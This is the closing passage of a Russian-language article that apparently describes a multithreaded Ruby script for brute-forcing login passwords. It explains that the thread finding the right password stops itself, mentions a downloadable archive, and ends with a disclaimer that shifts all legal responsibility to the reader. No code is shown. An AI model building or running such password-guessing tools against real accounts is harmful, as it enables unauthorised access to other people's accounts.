В случае если поток находит правильный пароль, то поток самоуничтожается, тем самым пресекая бессмысленные попытки авторизации с оставшимися, заведомо ложными паролями.

Ну вот и все, как запустить скрипт Ruby можно прочитать здесь, а скачвть все это дело одним архивом можно здесь

Статья является плодом бурной фантазии автора и не призывает ни к каким действиям,
противоречащим законодательству. Ответственность за использование материала ложиться только на вас!
Любые совпадения с реальными людьми считаются случайными.